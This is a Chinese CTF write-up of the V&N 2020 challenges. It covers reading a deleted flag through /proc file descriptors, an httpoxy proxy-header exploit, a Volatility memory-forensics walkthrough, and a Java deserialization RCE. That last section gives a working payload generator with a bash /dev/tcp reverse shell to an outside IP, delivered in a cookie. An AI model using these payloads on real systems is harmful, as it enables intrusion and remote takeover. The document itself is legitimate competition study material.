V&N 2020

Checkin

利用RCE反弹shell访问fd恢复文件

文件操作命令 cp、mv、rm 底层原理

https://blog.csdn.net/lqt641/article/details/60607165

app@c26d248e698b:/proc/1$ ls fd
ls fd
ls: cannot open directory 'fd': Permission denied
app@c26d248e698b:/proc/1$ cd ..
cd ..
app@c26d248e698b:/proc$ cd 10
cd 10
app@c26d248e698b:/proc/10$ ls fd
ls fd
0
1
2
3
4
5
app@c26d248e698b:/proc/10$ cat fd/0
cat fd/0
app@c26d248e698b:/proc/10$ cat fd/3
cat fd/3
flag{5a4a0c3f-6639-4948-b0a3-bf8f51702a75}

Time Travel

httpproxy问题:

https://www.anquanke.com/post/id/84227

添加:

Proxy: 174.1.22.100:5000

会被CGI解析成HTTP_PROXY

从而能打到我们的攻击机上

if(isset($_GET['flag'])) {
    $client = new Client();
    $response = $client->get('http://127.0.0.1:5000/api/eligible');
    $content = $response->getBody();
    $data = json_decode($content, TRUE);
    if($data['success'] === true) {
      echo system('/readflag');
    }

内存取证

这个内存取证题还蛮有意思的

首先拿到mem.raw

volatility分析

pslist

Volatility Foundation Volatility Framework 2.6
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x829af8c0 System                    4      0    101      479 ------      0 2020-02-18 19:52:20 UTC+0000
0x83c4d948 smss.exe                280      4      2       30 ------      0 2020-02-18 19:52:20 UTC+0000
0x83cc8030 csrss.exe               376    352      9      453      0      0 2020-02-18 19:52:20 UTC+0000
0x844e4d40 wininit.exe             432    352      3       79      0      0 2020-02-18 19:52:20 UTC+0000
0x844d9608 csrss.exe               440    424     10      311      1      0 2020-02-18 19:52:20 UTC+0000
0x84d59d40 services.exe            488    432      7      209      0      0 2020-02-18 19:52:21 UTC+0000
0x8466f030 lsass.exe               520    432      7      595      0      0 2020-02-18 19:52:21 UTC+0000
0x8466f600 lsm.exe                 528    432     10      146      0      0 2020-02-18 19:52:21 UTC+0000
0x8465e3b0 winlogon.exe            536    424      4      115      1      0 2020-02-18 19:52:21 UTC+0000
0x846af568 svchost.exe             668    488     10      356      0      0 2020-02-18 19:52:21 UTC+0000
0x846c0728 svchost.exe             740    488      8      285      0      0 2020-02-18 19:52:21 UTC+0000
0x8861ead8 svchost.exe             804    488     21      467      0      0 2020-02-18 19:52:21 UTC+0000
0x846e6300 svchost.exe             860    488     23      487      0      0 2020-02-18 19:52:21 UTC+0000
0x846edb38 svchost.exe             884    488     39      988      0      0 2020-02-18 19:52:21 UTC+0000
0x847315c0 audiodg.exe             988    804      7      132      0      0 2020-02-18 19:52:21 UTC+0000
0x8475d728 svchost.exe            1060    488     15      557      0      0 2020-02-18 19:52:21 UTC+0000
0x846a4740 WUDFHost.exe           1164    860      9      202      0      0 2020-02-18 19:52:22 UTC+0000
0x847913f8 svchost.exe            1260    488     17      382      0      0 2020-02-18 19:52:22 UTC+0000
0x846a8348 spoolsv.exe            1372    488     13      300      0      0 2020-02-18 19:52:22 UTC+0000
0x84805318 svchost.exe            1432    488     20      314      0      0 2020-02-18 19:52:22 UTC+0000
0x848104a8 taskhost.exe           1480    488     10      211      1      0 2020-02-18 19:52:22 UTC+0000
0x84648560 taskeng.exe            1536    884      5       76      0      0 2020-02-18 19:52:23 UTC+0000
0x84885348 imdsksvc.exe           1720    488      3       41      0      0 2020-02-18 19:52:23 UTC+0000
0x848a3d40 coherence.exe          1760    488      6       62      0      0 2020-02-18 19:52:23 UTC+0000
0x848a8b38 prl_tools_serv         1796    488     11      160      0      0 2020-02-18 19:52:23 UTC+0000
0x848b2728 dwm.exe                1832    860      4       73      1      0 2020-02-18 19:52:23 UTC+0000
0x848c52e8 coherence.exe          1840   1760      4       40      1      0 2020-02-18 19:52:23 UTC+0000
0x848ca878 dllhost.exe            1880    488      8       97      0      0 2020-02-18 19:52:23 UTC+0000
0x848df648 prl_tools.exe          1904   1796     10      144      1      0 2020-02-18 19:52:23 UTC+0000
0x848e4578 explorer.exe           1964   1808     31      873      1      0 2020-02-18 19:52:23 UTC+0000
0x84871b10 dllhost.exe             824    488     17      204      0      0 2020-02-18 19:52:24 UTC+0000
0x8486cd40 svchost.exe             696    488     11      307      0      0 2020-02-18 19:52:24 UTC+0000
0x848b3a00 prl_cc.exe             2204   1904     32      385      1      0 2020-02-18 19:52:24 UTC+0000
0x84992d40 msdtc.exe              2536    488     15      155      0      0 2020-02-18 19:52:25 UTC+0000
0x83940728 sppsvc.exe             2792    488      4      148      0      0 2020-02-18 19:52:28 UTC+0000
0x839cab10 SearchIndexer.         2868    488     13      588      0      0 2020-02-18 19:52:30 UTC+0000
0x83c0ad40 TrueCrypt.exe          3364   3188      7      388      1      0 2020-02-18 19:52:44 UTC+0000
0x837f5d40 notepad.exe            3552   1964      2       61      1      0 2020-02-18 19:53:07 UTC+0000
0x82a7e568 iexplore.exe           3640   1964     16      468      1      0 2020-02-18 19:53:29 UTC+0000
0x847c8030 iexplore.exe           3696   3640     25      610      1      0 2020-02-18 19:53:29 UTC+0000
0x848a7030 mspaint.exe            2648   1964     18      383      1      0 2020-02-18 19:54:01 UTC+0000
0x82b8bd40 svchost.exe            1660    488      7      112      0      0 2020-02-18 19:54:01 UTC+0000
0x83bf0030 mscorsvw.exe           2908    488      7       75      0      0 2020-02-18 19:54:24 UTC+0000
0x82bf4d40 dllhost.exe             628    668      6       86      1      0 2020-02-18 19:56:22 UTC+0000
0x82bf4768 dllhost.exe            1728    668      6       81      0      0 2020-02-18 19:56:22 UTC+0000
0x83922030 DumpIt.exe             1500   1964      2       39      1      0 2020-02-18 19:56:22 UTC+0000
0x82bf3408 conhost.exe            1872    440      2       51      1      0 2020-02-18 19:56:22 UTC+0000
0x82b85b40 WMIADAP.exe            1120    884      6       91      0      0 2020-02-18 19:56:23 UTC+0000
0x82a9fb38 WmiPrvSE.exe            684    668      8      119      0      0 2020-02-18 19:56:24 UTC+0000

有个mspaint,那么一般是要dump出来用gimp等工具恢复出来里面的图像

试一下常见的宽高,然后调偏移

最后大概是这样

暂时还不知道是啥意思

看到有notepad.exe

那么试一下notepadeditbox

editbox返回

Volatility Foundation Volatility Framework 2.6
******************************
Wnd Context       : 1\WinSta0\Default
Process ID        : 3640
ImageFileName     : iexplore.exe
IsWow64           : No
atom_class        : 6.0.7600.16385!Edit
value-of WndExtra : 0x4a13b8
nChars            : 0
selStart          : 0
selEnd            : 0
isPwdControl      : False
undoPos           : 0
undoLen           : 0
address-of undoBuf: 0x0
undoBuf           :
-------------------------

******************************
Wnd Context       : 1\WinSta0\Default
Process ID        : 3640
ImageFileName     : iexplore.exe
IsWow64           : No
atom_class        : 6.0.7600.16385!Edit
value-of WndExtra : 0x49f3d0
nChars            : 60
selStart          : 0
selEnd            : 0
isPwdControl      : False
undoPos           : 0
undoLen           : 0
address-of undoBuf: 0x0
undoBuf           :
-------------------------
https://pan.baidu.com/share/init?surl=jAVwrRzIgW1QsLHidtzY_w
******************************
Wnd Context       : 1\WinSta0\Default
Process ID        : 3552
ImageFileName     : notepad.exe
IsWow64           : No
atom_class        : 6.0.7600.16385!Edit
value-of WndExtra : 0x177ad0
nChars            : 78
selStart          : 0
selEnd            : 0
isPwdControl      : False
undoPos           : 0
undoLen           : 0
address-of undoBuf: 0x0
undoBuf           :
-------------------------
where is link?链接: https://pan.baidu.com/s/ 提取码: heem 复制这段内容后打开百度网盘手机App,操作更方便哦

有个度盘链接和验证码

但是复现的时候貌似么法打开了。。。。。

有iexplore.exe,可以用iehistory或者yarascan搞一下也能看到链接地址

接下来似乎是拿到TrueCrypt的密码,去解开链接下载的东西,然后一个压缩包,密码就是画图里dump出来的了

[V&N2020 公开赛]EasySpringMVC

看了一下以为要绕鉴权

结果ReadObject里有个奇怪的操作

  private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
    Object obj = in.readObject();
    (new ProcessBuilder((String[])obj)).start();
  }

这边反序列的时候说的时候把obj调用进(new ProcessBuilder((String[])obj)).start();里了

相当于可以直接RCE了

obj是从in.readObject();里面来的,查文档可以发现,in.readObject();是我们序列化时out.writeObject写入的

那就来生成一个

/*    */ package com.tools;
/*    */ import java.io.*;
/*    */
/*    */

/*    */
/*    */ public class Tools implements Serializable {
/*    */   private static final long serialVersionUID = 1L;
/*    */   
/*    */   public static Object parse(byte[] bytes) throws Exception {
/* 10 */     ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
/* 11 */     return ois.readObject();
/*    */   }
/*    */   private String testCall;
/*    */   public static byte[] create(Object obj) throws Exception {
/* 15 */     ByteArrayOutputStream bos = new ByteArrayOutputStream();
/* 16 */     ObjectOutputStream outputStream = new ObjectOutputStream(bos);
/* 17 */     outputStream.writeObject(obj);
/* 18 */     return bos.toByteArray();
/*    */   }
/*    */   
/*    */   private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
/* 22 */     Object obj = in.readObject();
/* 23 */     (new ProcessBuilder((String[])obj)).start();
/*    */   }
            private void writeObject(ObjectOutputStream out) throws IOException,ClassNotFoundException{
                String command[]={"bash","-c","bash -i>& /dev/tcp/172.16.138.142/2333 0>&1"};//执行命令 反弹Shell
                out.writeObject(command);
            }
/*    */ }


/* Location:              C:\Users\Eki\Desktop\springmvcdemo_2\WEB-INF\classes\!\com\tools\Tools.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       1.0.7
 */
package com.company;

import java.util.Base64;
import com.tools.*;

public class Main {

    public static void main(String[] args) {
        Base64.Encoder encoder = Base64.getEncoder();
        try {
            Tools cinfo = new Tools();
            byte[] bytes = Tools.create(cinfo);
            String payload = encoder.encodeToString(bytes);
            System.out.println(payload);
        } catch (Exception e){
            e.printStackTrace();
        }
    }
}

运行后将生成的payload放进cookie里就会触发了

© Eki's CTF-notes 2019-2020 CC-by-nc-sa 4.0。 all right reserved,powered by Gitbook本网站最后修订于: 2021-03-09 16:35:16

results matching ""

    No results matching ""